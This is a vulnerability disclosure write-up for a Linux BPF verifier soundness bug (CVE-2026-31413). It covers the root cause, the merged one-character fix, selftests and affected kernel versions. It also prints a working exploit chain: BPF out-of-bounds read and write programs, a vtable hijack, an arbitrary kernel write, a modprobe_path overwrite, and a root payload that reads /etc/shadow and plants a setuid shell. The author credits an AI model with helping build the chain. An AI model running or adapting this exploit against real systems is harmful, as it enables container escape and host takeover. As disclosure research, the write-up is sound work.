Original research · CVE-2026-31413
A soundness bug in the Linux BPF verifier's maybe_fork_scalars() function. A stray + 1 causes the verifier to skip an ALU instruction on a forked path, turning BPF_OR into arbitrary kernel R/W, vtable hijack, and full container escape to host root.
NadSec Research
Container escape via BPF verifier soundness bug.
NadSec original research
Full exploit chain running inside a Docker container with CAP_BPF + CAP_SYSLOG + CAP_PERFMON. No --privileged, no SYS_ADMIN. The exploit overwrites modprobe_path, triggers an unknown binary format, and the kernel runs the payload as root on the host.
I found a soundness bug in the Linux BPF verifier - a + 1 in a push_stack()
call that causes the verifier to skip an ALU instruction on a forked path. For
BPF_OR, this means the verifier tracks dst = 0 while the CPU computes
0 | K = K. I wrote a full container escape: OOB read/write from a BPF map,
vtable hijack, modprobe_path overwrite, root on the host. Then I wrote a
one-character fix and got it merged.
Exploit source, patches, and selftests: GitHub.
| | |
|---|---|
| CVE | CVE-2026-31413 |
| Bug class | Verifier soundness - register value divergence |
| Root cause | push_stack(env, env->insn_idx + 1, ...) skips ALU insn on forked path |
| Introduced | bffacdb80b93 - Linux 7.0-rc1 (Jan 14, 2026) |
| Fixed | c845894ebd6f - Linux 7.0-rc5 (Mar 22, 2026) |
| Affected | 6.12.75+ (stable backport dea9989a3f) through 7.0-rc4 |
| Impact | Arbitrary kernel R/W → container escape → host root |
| Required | CAP_BPF + CAP_PERFMON + CAP_NET_ADMIN |
| Fix | One character: insn_idx + 1 → insn_idx |
maybe_fork_scalars() forks verifier state when it sees ARSH + AND/OR with a
constant. The pushed path gets dst = 0 and skips the ALU instruction. For AND
that's fine: 0 & K = 0. For OR it's wrong: 0 | K = K, not 0.
The verifier thinks the register is zero. The CPU has K. I used that to build
arbitrary OOB read/write from a BPF map value, leaked the map's kernel address,
built a fake bpf_map_ops vtable, redirected map_push_elem through
array_map_get_next_key for arbitrary write, and overwrote modprobe_path.
Trigger an unknown binary format, kernel runs my script as root. In a container,
full host escape.
One-character fix. Merged by Alexei Starovoitov on March 22. CVE-2026-31413 assigned by Greg Kroah-Hartman on April 12.
eBPF lets you load small programs into the kernel - packet filters, tracing hooks, security policies - without compiling a kernel module. The catch is that you're injecting code into ring 0. If that code has a bug, it's a kernel bug.
So before any BPF program runs, the kernel's verifier simulates every possible execution path. It tracks what each register holds (a pointer? a scalar? what range?), checks every memory access against map bounds, and rejects anything that could read or write out of bounds. If the verifier says a program is safe, the JIT compiles it to native machine code and runs it at full kernel privilege. There are no runtime bounds checks after that point. The verifier is the security boundary.
This is why verifier soundness bugs are different from normal memory corruption. With a heap overflow or UAF, you get one corruption primitive and have to work from there - spray the heap, groom objects, race a window. With a verifier bug, you get the kernel to believe a lie about a register's value. Every bounds check that depends on that register passes. The kernel approved your OOB access. It runs it without question. If you can line the register state up correctly, you get a clean and reliable primitive out of it.
I was auditing maybe_fork_scalars() - new code, added January 2026 in
bffacdb80b93. State forking is always interesting because it's where the
verifier splits into parallel exploration paths, and if any path tracks an
incorrect value, everything downstream of that path is unsound.
The function forks when it sees ARSH + AND/OR with a constant source. Pushed
path gets dst = 0, skips the ALU instruction. I was reading the
push_stack(env, env->insn_idx + 1, ...) line and it clicked immediately - the
+ 1 means the pushed path never executes the ALU op. For AND, 0 & K = 0, so
skipping is fine. For OR, 0 | K = K. The pushed path thinks the result is 0
when it's actually K.
I wrote a BPF program that evening. ARSH 63 to get {0, -1}, OR with a
constant, conditional branch to separate the verifier paths, then add the
"zero" register to a map pointer. The verifier approved map_value + 0. The
CPU accessed map_value + K. KASAN confirmed the out-of-bounds access in
testing.
OOB read/write by the next morning. Container escape by the next night. I used
Claude (Opus 4.5) throughout - for working through the verifier's state
forking logic, brainstorming exploitation primitives, and turning the OOB
into a full escape chain. The vtable hijack approach came out of a back-and-forth
where Claude walked through the bpf_map_ops function pointers looking for
callable gadgets.
Commit bffacdb80b93 ("bpf: Recognize special arithmetic shift in the
verifier") landed January 14, 2026 in 7.0-rc1. Alexei Starovoitov, co-developed
by Puranjay Mohan. It added maybe_fork_scalars() to handle an LLVM
DAGCombiner pattern:
w2 s>>= 31 // arithmetic shift right: w2 becomes 0 or -1
w2 &= -134 // AND with constant K
LLVM lowers select_cc setlt X, 0, A, 0 to sra + and. After the arithmetic
right shift, the register is either 0 (non-negative input) or -1 (all ones).
AND with a constant gives 0 or K.
The verifier can't track {0, K} in a single bpf_reg_state - its signed range
[0, K] over-approximates, and that was causing it to reject valid Cilium
programs. The fix: fork the verifier state. One path explores dst = 0, the
other dst = -1, each tracking the precise value.
The implementation:
static int maybe_fork_scalars(struct bpf_verifier_env *env,
struct bpf_insn *insn,
struct bpf_reg_state *dst_reg)
{
// ... condition check: dst range is [-1, 0], src is constant ...
branch = push_stack(env, env->insn_idx + 1, env->insn_idx, false);
// ^^^^^^^^^^^^
// pushed path resumes AFTER the ALU insn
if (IS_ERR(branch))
return PTR_ERR(branch);
regs = branch->frame[branch->curframe]->regs;
__mark_reg_known(&regs[insn->dst_reg], 0); // pushed: dst = 0
__mark_reg_known(dst_reg, -1ull); // current: dst = -1
return 0;
}
Two things happen on the pushed path:

- dst is marked known: dst = 0
- execution resumes at insn_idx + 1 - the instruction after the ALU op

For BPF_AND: dst = 0, skip the AND. Runtime: 0 & K = 0. Match. Sound.
For BPF_OR: dst = 0, skip the OR. Runtime: 0 | K = K. Mismatch.
The verifier sees 0. The CPU has K. Unsound.
The function doesn't check the opcode. It was written for AND - where skipping
the instruction is the same as executing it with dst = 0 - and got applied to
OR too. For OR, that equivalence doesn't hold.
The trigger pattern is five instructions:
r6 = *(u64*)(map_value + 0) // load a positive value (guaranteed by map init)
r6 s>>= 63 // arithmetic shift: r6 = 0 (positive input)
r6 |= K // BUG: verifier forks, pushed path gets r6=0
if r6 s< 0 goto exit // steers verifier paths
r9 += r6 // verifier: r9 += 0 (in-bounds)
// runtime: r9 += K (OOB)
The verifier explores two paths:
Current path (dst = -1): The OR executes, -1 | K is still -1. The
branch r6 s< 0 is taken. The verifier follows the exit. This path is safe and
the verifier confirms it.
Pushed path (dst = 0, skipped OR): r6 = 0. The branch r6 s< 0 is not
taken. The verifier falls through to r9 += r6, sees r9 += 0, and approves the
subsequent memory access as in-bounds.
Runtime (dst = 0, OR executes): The map value is positive, so after ARSH,
r6 = 0. The OR executes: 0 | K = K. The branch K s< 0 is not taken (K is
positive). r9 += K - an out-of-bounds access by K bytes, approved by the
verifier as r9 += 0.
I control K. Arbitrary-offset OOB read or write, relative to any BPF map
value.
The read version stores the leaked data into a second map for userspace retrieval. The write version loads a value from a third map and writes it at the OOB offset. Both pass the verifier.
Here's the full oob_read_prog - this is the actual code from the exploit, not
pseudocode:
static int oob_read_prog(int map_fd, int dst_fd, int offset)
{
int K = -offset;
struct bpf_insn insn[] = {
/* look up map_fd[0] → R0 = pointer to value, load seed into R6 */
BPF_LD_MAP_FD(R1, map_fd),
BPF_MOV64_REG(R2, R10), BPF_ALU64_IMM(BPF_ADD, R2, -8),
BPF_ST_MEM(BPF_DW, R10, -8, 0),
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0,0,0, 1), /* map_lookup_elem */
BPF_JMP_IMM(BPF_JNE, R0, 0, 2), BPF_MOV64_IMM(R0,0), BPF_EXIT_INSN(),
BPF_LDX_MEM(BPF_DW, R6, R0, 0), /* R6 = seed (positive) */
/* look up dst_fd[0] → R9 = pointer to output buffer */
BPF_LD_MAP_FD(R1, dst_fd),
BPF_MOV64_REG(R2, R10), BPF_ALU64_IMM(BPF_ADD, R2, -8),
BPF_ST_MEM(BPF_DW, R10, -8, 0),
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0,0,0, 1),
BPF_JMP_IMM(BPF_JNE, R0, 0, 2), BPF_MOV64_IMM(R0,0), BPF_EXIT_INSN(),
BPF_MOV64_REG(R9, R0),
/* look up map_fd[0] again → R8 = base pointer for OOB access */
BPF_LD_MAP_FD(R1, map_fd),
BPF_MOV64_REG(R2, R10), BPF_ALU64_IMM(BPF_ADD, R2, -8),
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0,0,0, 1),
BPF_JMP_IMM(BPF_JNE, R0, 0, 2), BPF_MOV64_IMM(R0,0), BPF_EXIT_INSN(),
BPF_MOV64_REG(R8, R0),
/* === THE BUG === */
BPF_ALU64_IMM(BPF_ARSH, R6, 63), /* R6 = 0 (positive seed) */
BPF_ALU64_IMM(BPF_OR, R6, K), /* verifier: R6=0, runtime: R6=K */
BPF_MOV64_IMM(R7, 0),
BPF_ALU64_REG(BPF_SUB, R7, R6), /* R7 = -K = offset */
BPF_ALU64_REG(BPF_ADD, R8, R7), /* R8 = map_value + offset (OOB) */
BPF_LDX_MEM(BPF_DW, R0, R8, 0), /* OOB read: 8 bytes */
BPF_STX_MEM(BPF_DW, R9, R0, 0), /* store to output map */
BPF_MOV64_IMM(R0, 0),
BPF_EXIT_INSN(),
};
return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, insn, ARRAY_SIZE(insn));
}
And the OOB write - same ARSH+OR trick, but writes a value from a third map into the OOB offset:
static int oob_write_prog(int map_fd, int val_fd, int offset)
{
int K = -offset;
struct bpf_insn insn[] = {
/* look up map_fd[0], load seed, trigger the bug */
BPF_LD_MAP_FD(R1, map_fd),
BPF_ST_MEM(BPF_W, R10, -4, 0),
BPF_MOV64_REG(R2, R10), BPF_ALU64_IMM(BPF_ADD, R2, -4),
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0,0,0, 1),
BPF_JMP_IMM(BPF_JEQ, R0, 0, 20), BPF_MOV64_REG(R9, R0),
BPF_LDX_MEM(BPF_DW, R6, R9, 0), /* R6 = seed */
BPF_ALU64_IMM(BPF_ARSH, R6, 63), /* R6 = 0 */
BPF_ALU64_IMM(BPF_OR, R6, K), /* R6 = K (verifier: 0) */
BPF_JMP_IMM(BPF_JSLT, R6, 0, 13), /* skip if negative (verifier path) */
BPF_MOV64_IMM(R7, 0),
BPF_ALU64_REG(BPF_SUB, R7, R6), /* R7 = -K */
BPF_ALU64_REG(BPF_ADD, R9, R7), /* R9 = OOB target */
/* look up val_fd[0] → R8 = value to write */
BPF_LD_MAP_FD(R1, val_fd),
BPF_MOV64_REG(R2, R10), BPF_ALU64_IMM(BPF_ADD, R2, -4),
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0,0,0, 1),
BPF_JMP_IMM(BPF_JEQ, R0, 0, 4),
BPF_LDX_MEM(BPF_DW, R8, R0, 0), /* R8 = write value */
BPF_STX_MEM(BPF_DW, R9, R8, 0), /* OOB write */
BPF_MOV64_IMM(R0, 0), BPF_JMP_IMM(BPF_JA, 0, 0, 2),
BPF_MOV64_IMM(R0, 0), BPF_JMP_IMM(BPF_JA, 0, 0, 0),
BPF_EXIT_INSN(),
};
return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, insn, ARRAY_SIZE(insn));
}
To trigger either program, I attach it to a socket pair and push a packet through:
static int trigger_bpf_prog(int prog_fd)
{
int socks[2];
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks) < 0) return -1;
setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd));
char buf[64] = "x";
write(socks[1], buf, sizeof(buf));
struct timeval tv = { .tv_sec = 1 };
setsockopt(socks[0], SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv));
read(socks[0], buf, sizeof(buf));
close(socks[0]); close(socks[1]);
return 0;
}
The negate-and-add pattern (R7 = 0 - R6; R8 += R7) lets us reach negative
offsets from the map value - which is where the map's own metadata lives.
The full chain:
BPF_OR divergence (verifier: dst=0, runtime: dst=K)
│
▼
Arbitrary OOB read/write relative to map value
│
├── Read offset -136 → leak freeze_mutex.wait_list → map kernel address
├── Read offset -264 → leak ops vtable → confirm array_map_ops
│
▼
Build fake bpf_map_ops vtable in map value (42 slots from kallsyms)
→ slot 15 (map_push_elem) = array_map_get_next_key
│
▼
Corrupt map header via OOB writes
→ ops → fake vtable
→ map_type → BPF_MAP_TYPE_QUEUE (22)
→ max_entries → 0xFFFFFFFF
│
▼
bpf(BPF_MAP_UPDATE_ELEM) dispatches through map_push_elem
→ array_map_get_next_key(map, value, flags)
→ writes *(u32*)value + 1 to *(u32*)flags
→ flags = attacker-controlled kernel address
│
▼
Overwrite modprobe_path → "/tmpn/mo"
│
▼
Exec unknown binary format → kernel runs /tmpn/mo as root
│
▼
Restore map header → clean exit
A BPF_MAP_TYPE_ARRAY is backed by struct bpf_array, which embeds
struct bpf_map at offset 0. The actual map values start at offset 264 (after
the bpf_array header + alignment). So from value[0], the map's own metadata
sits at known negative offsets:
struct bpf_map (embedded in bpf_array)
┌────────────────────────────────────────┐
offset from val[0] │ │
-264 │ ops (struct bpf_map_ops *) │ ← vtable pointer
-240 │ map_type (u32) │
-236 │ key_size (u32) │
-232 │ value_size (u32) │
-228 │ max_entries (u32) │
│ ... │
-136 │ freeze_mutex.wait_list │ ← points back into struct
│ ... │
0 │ value[0] ← our OOB origin │
└────────────────────────────────────────┘
I verified these with pahole on the 6.12.76-docker vmlinux. On the tested
kernel, the offsets matched exactly.
Two OOB reads give me everything I need:
wait_list at offset -136. This is freeze_mutex.wait_list, a
list_head that points back to itself when the mutex is uncontested. Its value
is &map->freeze_mutex.wait_list - a kernel pointer into the map structure.
Subtract 128 and I have the map's base address. Add 264 and I have the kernel
address of value[0].
ops at offset -264. This is the bpf_map_ops vtable pointer. On an
unmodified kernel it points to the global array_map_ops symbol. I read it to
confirm the kernel isn't patched and to get the vtable address for cloning.
uint64_t wait_list = do_oob_read(victim, scratch, OFF_WAIT_LIST);
uint64_t map_addr = wait_list - 128;
uint64_t val_addr = map_addr + 264;
uint64_t ops = do_oob_read(victim, scratch, OFF_OPS);
if (ops != ARRAY_MAP_OPS) {
fprintf(stderr, "[-] ops mismatch! Kernel might be patched.\n");
return 1;
}
At this point I have: the map's kernel address, the address of my controlled
data (value[0]), and the confirmed vtable pointer.
bpf_map_ops has 42 function pointer slots. If I just zero out the ones I don't
need, the kernel will NULL-deref the first time it touches one. So I resolve
every symbol from /proc/kallsyms and build a complete copy:
uint64_t *vt = (uint64_t *)(val + 8); // offset 8 in value (slot 0 is seed)
vt[ 0] = sym_alloc_check; // map_alloc_check
vt[ 1] = sym_alloc; // map_alloc
vt[ 2] = 0; // map_release (unused path)
vt[ 3] = sym_free; // map_free
vt[ 4] = sym_get_next_key; // map_get_next_key
// ...
vt[12] = sym_lookup_elem; // map_lookup_elem
vt[13] = sym_update_elem; // map_update_elem
vt[14] = sym_delete_elem; // map_delete_elem
vt[15] = ARRAY_GET_NEXT_KEY; // map_push_elem ← THE HIJACK
// ...
vt[40] = sym_mem_usage; // map_mem_usage
Slot 15 is map_push_elem. In the real array_map_ops this is NULL (arrays
don't support push). I replace it with array_map_get_next_key.
Why get_next_key? Its signature is:
int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
It reads *(u32 *)key, increments it, and writes the result to *(u32 *)next_key. When called through the map_push_elem dispatch path:
int bpf_map_push_elem(struct bpf_map *map, void *value, u64 flags)
→ map->ops->map_push_elem(map, value, flags)
The flags argument lands in the next_key parameter. If I control flags, I
control the write destination. The value written is *(u32 *)value + 1 - a
small integer I can predict by setting the first 4 bytes of my push buffer.
Before I can use the fake vtable, I need to redirect the map to it and change
its type so the kernel dispatches through map_push_elem. Three OOB writes,
executed in order:
// Point ops at my fake vtable (lives at val_addr + 8)
exec_oob_write(prog_wr_ops, scratch, val_addr + 8);
// Disable max_entries bounds check
exec_oob_write(prog_wr_max, scratch, 0xFFFFFFFFULL);
// Change map_type to BPF_MAP_TYPE_QUEUE (22)
exec_oob_write(prog_wr_type, scratch, 22ULL);
The type change is critical. When userspace calls bpf(BPF_MAP_UPDATE_ELEM) on
an array map, the kernel dispatches through map_update_elem. But on a queue
map, the same syscall dispatches through map_push_elem - which now points to
array_map_get_next_key.
I pre-load all six BPF programs (three writes + three restores) before
corrupting anything. Once I corrupt the ops pointer, I can't load new BPF
programs that reference this map - the verifier would follow the fake vtable and
crash. Everything has to be staged in advance.
Now I can write 4 bytes to any kernel address:
#define ARB_WRITE32(addr, val32) do { \
uint32_t _v = (val32); \
uint32_t _pv = _v - 1; \
memset(push_buf, 0, sizeof(push_buf)); \
memcpy(push_buf, &_pv, 4); \
map_push(victim, push_buf, (addr)); \
} while(0)
map_push() calls bpf(BPF_MAP_UPDATE_ELEM) with flags = addr. The kernel
dispatches to my hijacked map_push_elem → array_map_get_next_key(map, push_buf, addr). It reads *(u32 *)push_buf (which is val - 1), adds 1, and
writes val to *(u32 *)addr.
KASAN constraint: writes only succeed at 8-byte aligned addresses on this
kernel. Not a real limitation for modprobe_path.
modprobe_path is a global char[256] in the kernel, default /sbin/modprobe.
When the kernel encounters an executable with an unknown magic number, it invokes
modprobe_path as root to load the appropriate module. Overwrite it with a path
I control, trigger an unknown binary format, and the kernel runs my script as
root.
The target path is /tmpn/mo. I can't write arbitrary strings - I write 4 bytes
at a time via get_next_key's integer increment. But I only need two writes:
// Original: "/sbin/modprobe\0"
// Write "/tmp" at offset 0:
ARB_WRITE32(MODPROBE_PATH + 0, 0x706d742fU); // "/tmp" little-endian
// Write "\0\0\0\0" at offset 8 (null-terminate):
ARB_WRITE32(MODPROBE_PATH + 8, 0x00000000U);
// Bytes 4-7 are untouched: "n/mo" from original "/sbin/modprobe"
// Result: "/tmpn/mo\0"
In container mode, modprobe_path resolves in the init mount namespace - not
the container's. So the payload script has to exist at /tmpn/mo on the host.
With --pid=host or a shared PID namespace, I reach the host filesystem through
/proc/1/root/:
snprintf(payload_script, sizeof(payload_script), "/proc/1/root/tmpn/mo");
For the demo, the orchestrator pre-stages the payload on the host. The exploit
creates the trigger binary - 4 bytes of \xff - and executes it. The kernel
doesn't recognize the format, looks up modprobe_path, finds /tmpn/mo, and
runs it as root.
The payload:
#!/bin/sh
id > /tmp/pwned
cat /etc/shadow >> /tmp/pwned 2>/dev/null
cp /bin/sh /tmp/pwn 2>/dev/null && chmod 04755 /tmp/pwn 2>/dev/null
After the modprobe_path write, I restore the map header - type, max_entries,
ops - using the three pre-loaded restore programs. The map goes back to being a
normal array. No dangling fake vtable, no kernel instability. The exploit is
single-shot and leaves a clean state.
exec_oob_write(prog_rst_type, scratch, orig_type_key);
exec_oob_write(prog_rst_max, scratch, orig_max);
exec_oob_write(prog_rst_ops, scratch, orig_ops);
In my demo environment, the full chain from first OOB read to root shell took a couple of seconds.
The exploit requires CAP_BPF + CAP_PERFMON + CAP_NET_ADMIN. You won't get that
from an unprivileged container or a normal user account on a hardened system.
But there are a lot of contexts where you do have those caps.
If kernel.unprivileged_bpf_disabled=0 (check with sysctl), any local user
can load BPF programs. This used to be the default on older distros and is
sometimes enabled for dev/test environments. On those systems, this is a
straight local privilege escalation - any user to root, no special permissions
needed.
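A quick way to check is reading the sysctl directly. The helper function below is my own naming, not a standard tool:

```shell
# Interprets kernel.unprivileged_bpf_disabled: 0 means any local user can
# load BPF programs; 1 or 2 mean unprivileged loads are refused.
bpf_sysctl_status() {
    case "$1" in
        0) echo "unprivileged BPF load allowed" ;;
        1|2) echo "unprivileged BPF load disabled" ;;
        *) echo "unknown" ;;
    esac
}

bpf_sysctl_status "$(cat /proc/sys/kernel/unprivileged_bpf_disabled 2>/dev/null || echo '?')"
```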
Most modern distros ship with unprivileged_bpf_disabled=1 or =2 (locked), so
this path is closed on default installs of Ubuntu 22.04+, Debian 12+, Fedora,
RHEL 9, etc.
This is where the bug hurts. Standard unprivileged containers drop CAP_BPF, so
they can't trigger the bug. But a lot of infrastructure pods run with elevated
caps:
| Product | Default Privileges | Notes |
|---|---|---|
| Cilium (GKE Dataplane V2) | CAP_SYS_ADMIN + CAP_NET_ADMIN | Network policy, runs on every node |
| Falco | privileged: true | Runtime security, mounts /dev |
| Tetragon | privileged: true | eBPF observability |
| Datadog Agent | CAP_SYS_ADMIN + 7 more | Metrics, logs, APM |
| Pixie | privileged: true | eBPF-based observability |
| Tracee | privileged: true or BPF caps | Aqua's runtime security |
These typically run as DaemonSets - one pod per node, cluster-wide. If an attacker compromises any of these pods (RCE in a web service on the same node, supply chain attack, SSRF into an agent API, etc.), they have the caps needed to run this exploit and escape to host root.
From host root on one node, lateral movement to other nodes is usually possible via the same DaemonSet (shared service accounts, mounted secrets, etc.).
Google GKE uses Cilium as Dataplane V2 by default. If GKE nodes run an unpatched
6.12.x kernel (check your node pool version), any Cilium pod compromise turns
into host root and node takeover. I built the exploit specifically for this
scenario - that's why it's called exploit_gke.c.
Amazon EKS and Azure AKS are also potentially affected if they're running 6.12.x kernels with Cilium or similar BPF-based networking. Need to check specific AMI/VM image versions.
Important caveat: The exploit only works on kernels containing the
vulnerable code (6.12.75-6.12.79, 6.18.x-6.18.20, 6.19.x-6.19.10, 7.0-rc1 to
rc4). Most production K8s clusters run older LTS kernels. Check your node
kernel version with uname -r before assuming exploitability.
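For scripted triage, a rough helper (my naming) covering only the 6.12.y stable window listed above; extend the cases for 6.18.y, 6.19.y, and 7.0-rc as needed:

```shell
# Returns 0 only for the vulnerable 6.12.y stable releases (6.12.75-6.12.79).
kernel_in_vulnerable_6_12_window() {
    case "$1" in
        6.12.75|6.12.76|6.12.77|6.12.78|6.12.79) return 0 ;;
        *) return 1 ;;
    esac
}

# Strip distro suffixes like "-generic" before comparing.
if kernel_in_vulnerable_6_12_window "$(uname -r | cut -d- -f1)"; then
    echo "kernel is in the vulnerable 6.12.y range"
else
    echo "not in the 6.12.y vulnerable range (check the other branches)"
fi
```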
Android uses eBPF for network traffic accounting (netd), power profiling, and
memory tracking. Current Android devices (14/15) use 6.1 LTS kernels, which are
not affected. Android 16 may adopt 6.12 LTS - if it does, and if the
vulnerable backport is included, the attack surface would be system services
like netd and system_server that load BPF programs.
This is speculative and depends on Android's kernel adoption timeline. I filed with Android VRP for tracking.
System containers that share the host kernel (unlike VMs) are fully exposed. Compromise the shared kernel = compromise the host + every other container on it. This is different from Docker/containerd where you're escaping to a host that might itself be a VM.
This is a guest kernel bug, not a hypervisor escape. If you run the exploit inside an EC2 instance, you get root on that instance - you don't escape the Nitro hypervisor to the physical host or other tenants. Same for GCE, Azure VMs, KVM, etc. The hardware boundary holds.
| Branch | Affected | Fixed |
|---|---|---|
| 6.12.y (LTS) | dea9989a3f through 6.12.79 | 6.12.80+ |
| 6.18.y | 4c122e8ae149 through 6.18.20 | 6.18.21+ |
| 6.19.y | e52567173ba8 through 6.19.10 | 6.19.11+ |
| mainline | 7.0-rc1 through 7.0-rc4 | 7.0-rc5+ |
Introducing commit: bffacdb80b93 ("bpf: Recognize special arithmetic shift in the verifier")
Fix commit: c845894ebd6f
CAP_BPF is not a safe capability. A verifier bug converts it into arbitrary
kernel read/write. Products that grant it to workload pods should treat it as
CAP_SYS_ADMIN.
One character:
- branch = push_stack(env, env->insn_idx + 1, env->insn_idx, false);
+ branch = push_stack(env, env->insn_idx, env->insn_idx, false);
Instead of pushing the branch to insn_idx + 1 (skipping the ALU instruction),
push to insn_idx - the instruction itself. The pushed path re-executes the
ALU op with dst = 0:
0 & K = 0 ✓
0 | K = K ✓

The original approach was clever - skip the instruction and hardcode the result, saving one verifier step on the pushed path. But that optimization only works when the result of executing the instruction with dst = 0 is zero. That's true for AND and false for OR. The fix gives up the optimization: just run the instruction again and let the verifier compute the correct value for any opcode.
I went through three patch revisions:

- An early revision added an opcode parameter to maybe_fork_scalars() and set dst = K for OR, dst = 0 for AND on the pushed path. Worked but added complexity.
- The final revision pushes to insn_idx instead of insn_idx + 1. Simpler, opcode-independent, eliminates the entire class of skip-vs-execute bugs.

Merged as c845894ebd6f on March 22 by Alexei Starovoitov. Selftests in 0ad1734cc559. Reviewed by Eduard Zingerman, acked by Amery Hung.
The selftests cover three cases:

- or_scalar_fork_rejects_oob - ARSH 63 + OR 8, value_size=8, access at offset 8 is OOB → must reject
- and_scalar_fork_still_works - regression test, AND path still accepts
- or_scalar_fork_allows_inbounds - OR 4, value_size=8, offset 4 is in-bounds → must accept

Linus merged d5273fd3ca0b ("Merge tag 'bpf-fixes'") with the note: "Fix unsound scalar fork for OR instructions (Daniel Wade)".
| Date | Event |
|---|---|
| 2026-01-14 | bffacdb80b93 introduces maybe_fork_scalars() in 7.0-rc1 |
| 2026-03-04 | Bug backported to 6.12.y stable as dea9989a3f |
| 2026-03-11 | I find the bug during verifier audit |
| 2026-03-12 | OOB read/write confirmed, exploit working |
| 2026-03-13 | Container escape PoC complete, video recorded |
| 2026-03-14 | Patch v3 sent to bpf@vger.kernel.org |
| 2026-03-22 | Fix merged by Alexei Starovoitov into bpf/bpf.git |
| 2026-04-06 | Linus merges bpf-fixes tag into mainline |
| 2026-04-12 | CVE-2026-31413 assigned by Greg Kroah-Hartman |
- c845894ebd6f ("bpf: Fix unsound scalar forking in maybe_fork_scalars() for BPF_OR")
- 0ad1734cc559 ("selftests/bpf: Add tests for maybe_fork_scalars() OR vs AND handling")
- bffacdb80b93 ("bpf: Recognize special arithmetic shift in the verifier")

CVE-2026-31413 - Fixed in Linux 7.0-rc5. Affected: 6.12.75+ (stable backport) through 7.0-rc4.
Daniel Wade - GitHub · Twitter/X · Bluesky · Mastodon · Medium · danjwade95@gmail.com